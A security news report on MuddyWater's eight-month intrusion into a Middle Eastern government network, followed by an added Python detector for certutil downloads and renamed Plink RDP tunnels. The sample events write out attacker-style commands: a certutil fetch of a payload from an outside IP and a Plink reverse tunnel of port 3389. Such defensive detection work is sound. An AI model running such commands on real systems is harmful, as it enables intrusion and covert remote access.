Iranian hackers lurked in Middle Eastern govt network for 8 months (Security News, October 2023)
The Iranian hacking group tracked as MuddyWater breached at least twelve computers belonging to a Middle Eastern government network and maintained access for eight months between February and September 2023.
The attacks observed by Symantec began on February 1, 2023, and involved a wide assortment of malware, tools, and malicious activity over the following 8 months.
On February 5, the attackers compromised a second computer in the network and used a masqueraded version of Plink to configure RDP access.
On September 1, the attackers compromised three more computers, using certutil to download Plink onto them, and ran Wireshark commands on the second web server to capture network and USB traffic packets.
Activity on the second web server continued until September 9, 2023, with the attackers executing an unknown PowerShell script and mounting and unmounting network shares.
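The report describes three host-level signals a defender can hunt for: certutil used as a downloader, a renamed copy of Plink, and Plink forwarding the RDP port. The following is an added detection example, not code from the article or from Symantec; it runs over constructed Sysmon-style process-creation events (the IP addresses, paths and OriginalFileName values are made up for illustration).

```python
import re

# Constructed sample process-creation events with Sysmon Event ID 1 style fields.
# None of these values come from the Symantec report; they are illustrative only.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "Plink",
     "CommandLine": r"svchost.exe -N -R 0.0.0.0:8080:127.0.0.1:3389 user@203.0.113.10 -pw x"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://203.0.113.10/p.exe C:\Windows\Temp\svchost.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -verify C:\certs\site.cer"},  # benign certutil use
    {"Image": r"C:\Program Files\PuTTY\plink.exe", "OriginalFileName": "Plink",
     "CommandLine": r"plink.exe -batch admin@10.0.0.5 uptime"},  # legitimate admin use
]


def detect(event):
    """Return the list of detection names that fire for one process-creation event."""
    findings = []
    image = event["Image"].rsplit("\\", 1)[-1].lower()        # file name only
    orig = event.get("OriginalFileName", "").lower()          # name from the PE version resource
    cmd = event["CommandLine"].lower()

    # 1. Masquerade: binary identifies itself as Plink but runs under another file name.
    if "plink" in orig and "plink" not in image:
        findings.append("masqueraded_plink")

    # 2. Plink -R/-L port forwarding that touches the RDP port (3389).
    if "plink" in orig and re.search(r"-(r|l)\s+\S*3389", cmd):
        findings.append("rdp_tunnel")

    # 3. certutil fetching content from a URL (living-off-the-land download).
    if image == "certutil.exe" and "-urlcache" in cmd and re.search(r"https?://", cmd):
        findings.append("certutil_download")

    return findings


def scan(events):
    """Flatten detections over a batch of events as (image, detection) pairs."""
    return [(e["Image"], f) for e in events for f in detect(e)]


if __name__ == "__main__":
    for image, finding in scan(SAMPLE_EVENTS):
        print(f"{finding:20} {image}")
```

The benign certutil and PuTTY events produce no findings, which is the point of keying on the URL fetch and on the OriginalFileName mismatch rather than on the tool names alone.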
Related news
- Iranian hackers charged for 'hack-and-leak' plot to influence election
- Iranian hackers now exploit Windows flaw to elevate privileges
- Iranian hackers act as brokers selling critical infrastructure access
- Iranian Hackers Use "Dream Job" Lures to Deploy SnailResin Malware in Aerospace Attacks
- Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations